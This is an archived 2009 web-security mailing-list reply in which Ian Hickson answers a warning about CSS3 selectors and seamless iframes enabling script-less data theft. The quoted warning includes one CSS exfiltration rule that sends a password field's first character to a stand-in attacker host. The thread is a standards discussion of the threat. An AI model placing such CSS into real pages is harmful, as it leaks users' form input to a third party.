- From: Ian Hickson <ian@hixie.ch>
- Date: Sun, 6 Dec 2009 06:16:59 +0000 (UTC)
- To: sird@rckc.at
- Cc: public-web-security@w3.org
On Fri, 4 Dec 2009, Eduardo Vela wrote:
>
> I sincerely understand why people want seamless iframes on HTML5.. I
> mean, I've been there.. but sometimes the better way to do something is
> not to do it.
>
> The perfect example are seamless iframes (defined in html5) and CSS3
> selectors.
>
> What I see with those awesome CSS3 selectors such as:
>
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary
> files from the page WITHOUT the need of JS.
How is the attacker inserting CSS into the page, in this scenario?
I agree that if an attacker can insert CSS into a victim page, that
numerous information retrieval attacks are possible (though not currently
a password attack, as Maciej mentioned). However, this has long been
known, it doesn't seem to be a new problem.
--
Ian Hickson U+1047E )\._.,--....,'``. fL
http://ln.hixie.ch/ U+263A /, _.. \ _\ ;`._ ,.
Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Received on Sunday, 6 December 2009 06:17:31 UTC